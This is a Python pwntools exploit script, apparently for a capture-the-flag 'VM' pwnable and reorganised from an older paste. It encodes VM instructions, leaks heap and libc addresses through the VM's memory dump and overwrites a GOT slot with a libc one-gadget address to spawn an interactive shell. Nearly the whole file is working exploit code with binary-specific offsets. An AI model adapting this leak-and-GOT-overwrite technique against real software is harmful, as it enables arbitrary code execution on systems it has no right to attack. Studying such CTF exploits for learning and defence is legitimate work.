fix ex


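"""Exploit script for the "VM" pwnable: leak heap/libc through the VM's
memory dump, then rewrite a GOT slot with a libc gadget address.

The whole script was a flattened Python 2 paste; it is reorganised here
into instruction encoders, a leak-reading helper and a main() flow.  The
magic numbers (leak offsets, GOT address, gadget offset) are taken
verbatim from the original and are specific to that binary and libc build.
Pure debugging prints from the original were dropped; the exploit I/O is
unchanged except that dump bytes are read with recvn() (see recv_le).
"""
from pwn import *

try:                      # the original script targets Python 2 (raw_input)
    _prompt = raw_input
except NameError:         # Python 3
    _prompt = input

# Instruction-word layout these encoders assume.  It is derived from the
# shifts and masks used by the original helpers; the field names are the
# reviewer's reading of them, not documentation of the VM itself:
#   bits 28-31  opcode            bits 26-27  addressing mode
#   bits 23-25  register A        bits 20-22  register B
#   bits 16-19  always 0xf        bits  0-15  16-bit immediate
_IMM_MAX = 0xffff
_REG_MAX = 7


def _check(value, limit, what):
    """Return `value` if 0 <= value <= limit, else raise ValueError.

    The original helpers OR'd immediates into the word unmasked and
    silently truncated register numbers, so an oversized operand corrupted
    neighbouring fields without any warning.
    """
    if not 0 <= value <= limit:
        raise ValueError('%s out of range: %#x (max %#x)' % (what, value, limit))
    return value


def _encode(opcode, mode, reg_a=0, reg_b=0, imm=0):
    """Assemble one 32-bit VM instruction word from its fields."""
    _check(opcode, 0xf, 'opcode')
    _check(mode, 3, 'mode')
    _check(reg_a, _REG_MAX, 'register A')
    _check(reg_b, _REG_MAX, 'register B')
    _check(imm, _IMM_MAX, 'immediate')
    return ((opcode << 28) | (mode << 26) | (reg_a << 23) | (reg_b << 20)
            | (0xf << 16) | imm)


def dump():
    """Opcode 0 / mode 3: the instruction whose output main() parses for leaks."""
    return _encode(0, 3)


def setreg(ind, val):
    """Opcode 1 / mode 1: load the 16-bit immediate `val` into register `ind`."""
    return _encode(1, 1, reg_a=ind, imm=val)


def movreg(src, dest):
    """Opcode 1 / mode 0: register `src` in field B, `dest` in field A."""
    return _encode(1, 0, reg_a=dest, reg_b=src)


def pad(x):
    """Render an instruction word as exactly eight lowercase hex digits.

    Instructions are sent as fixed-width 8-character hex strings, and main()
    concatenates many of them on one line, so a word wider than 32 bits
    would desynchronise the whole stream.  The original rjust(8) never
    enforced the width; reject out-of-range words instead.  %08x also
    avoids the trailing 'L' Python 2's hex() appends to longs.
    """
    _check(x, 0xffffffff, 'instruction word')
    return '%08x' % x


def push(ind, val):
    """Opcode 8 / mode 2: push with register `ind` and immediate `val`."""
    return _encode(8, 2, reg_a=ind, imm=val)


def push_s(val):
    """Opcode 8 / mode 3: push the 16-bit immediate `val` (no register field)."""
    return _encode(8, 3, imm=val)


def xchg(r1, r2):
    """Opcode 5 / mode 0: exchange registers `r1` (field A) and `r2` (field B)."""
    return _encode(5, 0, reg_a=r1, reg_b=r2)


def pop(ind):
    """Opcode 9 / mode 2: pop into register `ind`."""
    return _encode(9, 2, reg_a=ind)


def sub(ind):
    """Opcode 7 / mode 2: subtract with register `ind` in field A."""
    return _encode(7, 2, reg_a=ind)


def recv_le(p, nbytes):
    """Read `nbytes` dump bytes ("xx xx xx ...") as a little-endian integer.

    Each byte is printed as two hex digits plus one separator character,
    so exactly three characters are consumed per byte.  recvn() blocks
    until all three have arrived; the original recv(3) returns *up to*
    three bytes, so a slow pipe could hand back a truncated leak.
    """
    value = 0
    for i in range(nbytes):
        value |= int(p.recvn(3)[:2], 16) << (8 * i)
    return value


def main():
    """Run the exploit against ./VM and drop into an interactive shell."""
    p = process('./VM')

    # Stage 1: point r7 at 0x4080 and dump to leak a heap pointer.  The
    # setreg is repeated 0x20 times on one line as in the original; the
    # reason is not recoverable from the script (presumably to fill the
    # instruction buffer).
    p.sendline(pad(setreg(7, 0x4030 - 0x30 + 0x80)) * 0x20)
    p.sendline(pad(dump()))
    p.recvuntil('0x4070 ')
    heapleak = recv_le(p, 4)
    print(hex(heapleak))
    heapbase = heapleak - 0x15cd0          # leak-to-heap-base distance for this binary
    log.info('heapbase : ' + hex(heapbase))

    # Stage 2: dump at 0x44d0 to leak a 6-byte libc pointer.
    p.sendline(pad(setreg(7, 0x4000 + 0x470 + 0x60)))
    p.sendline(pad(dump()))
    p.recvuntil('0x44b0 ')
    libcleak = recv_le(p, 6)
    libc = libcleak - 0x3c4be8             # libc-build-specific offset
    reg_base = heapbase + 0x11c20          # where the VM keeps its registers, per the original
    log.info('libc : ' + hex(libc))

    overwrite_got = 0x60c010               # GOT slot to overwrite (binary is not PIE)
    one_gadget = libc + 0x45390 + 0xabd87  # labelled "onegadget" in the original; build specific
    log.info('system' + hex(one_gadget))

    # Offset from the register file to the GOT slot, carried as a 32-bit
    # wrap-around value and loaded into r0 in two 16-bit halves, then
    # swapped into r7.  The -0x30+2 fudge is kept from the original.
    off = overwrite_got - reg_base + 0x100000000 - 0x30 + 2
    print('off' + hex(off))
    p.sendline(pad(setreg(0, off & 0xffff)))
    p.sendline(pad(setreg(7, 0x4000 + 4)))
    p.sendline(pad(push_s(off >> 16)))
    p.sendline(pad(setreg(7, 0x4000)))
    p.sendline(pad(xchg(0, 7)))

    # Stage 3: feed the gadget address 16 bits at a time -- push a chunk,
    # then pop twice into r2 (the exact memory effect of the pop pair is
    # the VM's; the sequence is exactly the original's).
    pay = ''
    for k in range(4):
        pay += pad(push_s((one_gadget >> (16 * k)) & 0xffff))
        if k < 3:
            pay += pad(pop(2)) * 2
    pay += pad(movreg(7, 1))
    pay += pad(sub(1)) * 6
    # NOTE(review): the source was flattened; the dump is assumed to follow
    # the six sub()s once rather than sit inside the loop -- confirm against
    # the original write-up.
    pay += pad(dump())
    _prompt('>')
    p.sendline(pay)
    print('one :' + hex(one_gadget))
    p.interactive()


if __name__ == '__main__':
    main()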

